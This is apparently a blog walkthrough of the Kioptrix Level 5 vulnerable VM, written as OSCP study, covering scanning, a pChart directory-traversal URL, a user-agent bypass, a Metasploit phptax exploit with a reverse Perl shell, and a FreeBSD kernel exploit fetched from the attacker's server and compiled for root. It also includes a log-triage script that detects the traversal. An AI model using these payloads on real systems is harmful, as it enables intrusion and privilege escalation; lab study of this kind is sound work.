Kioptrix: Level 5 Walkthrough
This is the fifth post of a series of posts I’m creating to study for OSCP. You can find the previous post by clicking here.
URL: https://www.vulnhub.com/entry/kioptrix-2014-5,62/
Release date: 6 Apr 2014
Author: Kioptrix
Provided description: As usual, this vulnerable machine is targeted at the beginner. It’s not meant for the seasoned pentester or security geek that’s been at this sort of stuff for 10 years. Everyone needs a place to start and all I want to do is help in that regard.
Vulnerabilities Found:
Kernel Exploit;
Directory Traversal;
Sensitive File Disclosure;
Privilege Escalation;
Remote Code Execution.
At the time of this writing, this is the last VM of the Kioptrix series. Come with me and see how to exploit this machine.
# Scanning and Enumeration
To start gathering information about the machine, we have to scan it.
Nmap
With nmap, we found that this VM is most likely running FreeBSD:
nmap -p- -A <ipAddress>
where:
-p- scans all 65535 TCP ports;
-A enables OS detection, version detection, script scanning, and traceroute.
Only 3 ports came up, but that should be enough to exploit the machine.
Nikto
With Nikto, we got an interesting piece of information that we may be able to use later on:
The exploit Nikto mentions is the same one we used on the first Kioptrix machine:
We will save this information for later.
Looking at the website on port 80, we don’t have anything interesting, only the following message:
Looking at the website on port 8080, we are not allowed to browse it:
But if we look at the source code of the page on port 80, there is something that will certainly help us:
It says "URL". Should we try appending this path to the server URL?
http://<ipaddress>/pChart2.1.3/index.php
It worked, and it opens a page with a software called pChart.
GoBuster
Now that we have something to explore, I ran gobuster to see what is in there:
gobuster dir -u http://<ipaddress>/pChart2.1.3/ -w <wordlistPath>/dirbuster/directory-list-2.3-medium.txt -t 50 -x .html,.php
Browsing the discovered directories, there is not much that is useful to us, only an ordinary set of files.
# Exploiting
During the scanning phase, Nikto mentioned an exploit that could help us exploit this machine. I tried the CVE that Nikto presented to us, but it didn't work as expected. Try it for yourself:
Well, I had never heard about pChart before, so I searched the internet for any available exploit, and on Exploit DB I found a useful directory traversal exploit:
It states that if you run the following URL, you’ll be able to access files that you should not have access to:
http://<ipaddress>/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
There it is, information disclosure. But this file alone does not help us that much. I tried to read /etc/shadow as well, but it didn't work (for obvious reasons: the www user doesn't have access to it). I then tried to find the server config files to see if they contain any juicy information. After searching a little bit, I found the path of the Apache config file on FreeBSD:
/usr/local/etc/apache22/httpd.conf
With that, we just append the path to the end of that URL:
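From the defender's side, the traversal requests shown above leave a clear trace in the Apache access log. The following triage script is an added example, not code from the original post: it parses constructed "combined"-format log lines (the pChart path and the Action/Script parameter names are taken from the walkthrough, the IPs, timestamps and sizes are made up), percent-decodes the query string until it is stable, and flags any parameter that contains a ../ sequence or names one of the files discussed in this section.

```python
# Added example (not part of the original walkthrough): triage Apache
# access-log lines for the pChart directory-traversal pattern.
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample log lines in Apache "combined" format.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Apr/2014:10:00:01 +0000] "GET /pChart2.1.3/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Apr/2014:10:00:07 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1801 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Apr/2014:10:00:09 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%252f..%252f..%252fusr/local/etc/apache22/httpd.conf HTTP/1.1" 200 9001 "-" "curl/7.64.0"
10.0.0.9 - - [06/Apr/2014:10:00:12 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.drawBarChart.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Files the walkthrough reads through the traversal (shadow was attempted).
SENSITIVE = ("/etc/passwd", "/etc/shadow", "httpd.conf")

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so a double-encoded %252f ('/') is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return findings for one request target; an empty list means benign."""
    findings = []
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in query.items():
        for raw in values:  # parse_qs already decoded one layer
            val = fully_decode(raw).replace("\\", "/")
            if "../" in val:
                findings.append(f"traversal in {name}")
            if any(s in val for s in SENSITIVE):
                findings.append(f"sensitive file in {name}")
    return findings

def triage(log_text):
    """Return (ip, status, target, findings) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (findings := classify(m["target"])):
            hits.append((m["ip"], int(m["status"]), m["target"], findings))
    return hits

if __name__ == "__main__":
    for ip, status, target, findings in triage(SAMPLE_LOG):
        print(ip, status, ", ".join(findings), target)
```

A 200 status on a flagged line means the server actually served the file, which is the case to escalate first.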
I read the whole file from top to bottom, and near the end of the document I found the following useful part:
It says that we are allowed to browse the web server running on port 8080 only when our User-Agent identifies as Mozilla/4.0. Remember that we didn't have access to it? Well, now we can get access, as long as we meet this criterion. I have a browser extension called User-Agent Switcher, which is really helpful because it lets you set whatever agent string you want when testing your applications.
Once you install it on your browser, click on the pencil button to edit the user-agent string:
Type Mozilla/4.0 and hit 'OK':
If we test the page now, we should have access to it:
You can also test it using curl with the -A parameter, which lets you specify the agent string:
curl -A "Mozilla/4.0" -L http://<ipaddress>:8080
If we click on the link on that page, it shows us a piece of software called phptax, another one that I had no clue about. Using the same process, let's go ahead and search the internet for exploits for this one. The following exploits came up, but they didn't work for me:
Because I'm studying for the OSCP exam, I'm trying by all means to avoid using Metasploit, but unfortunately I couldn't find any other payload that worked well, so I found and used the following Metasploit module:
Then I started setting it up:
msfconsole
use <metasploitModule>
set payload cmd/unix/reverse_perl
set rhosts <VictimMachineIP>
set rport 8080
set lhost <attackerMachineIP>
set lport <someAttackerMachinePort>
Once you are done configuring it, launch the exploit with run or exploit:
We now have a low-privileged user.
If this payload does not work for you, you can try the other ones in this list:
show payloads
My suggestion is the 7th one.
# Privilege Escalation
The first thing I tried was to find the OS version, to make sure we know the exact version and can see what we can exploit. You can run the command below to find the OS version:
uname -mrs
We can use the searchsploit tool and see if we have an exploit for FreeBSD 9:
searchsploit FreeBSD 9
The first one worked for me. It is a Kernel exploit for FreeBSD:
The second one didn’t:
Now that I have downloaded the exploit to my attacker machine, it is time to transfer it to the victim machine. Here I used the same approach as on the other Kioptrix machines, but instead of wget I used fetch, since that is what FreeBSD ships with:
On the attacker machine:
python3 -m http.server
On the victim machine:
fetch http://<attackerIP>:8000/28718.c
All you have to do now is compile the C file and run it:
gcc -o 28718 28718.c
./28718
Aaand, we are root! Go to /root and get your flag.
# Conclusion
This was the last machine of the Kioptrix series. I had never used FreeBSD before, so I learned a few things about it while exploiting this machine. The lack of a TTY shell gave me some difficulties while I was connected as the low-privileged user, but luckily there was a kernel exploit for this FreeBSD version. I hope you liked it; if you have any questions, please ask them in the comments section.
See you in the next post!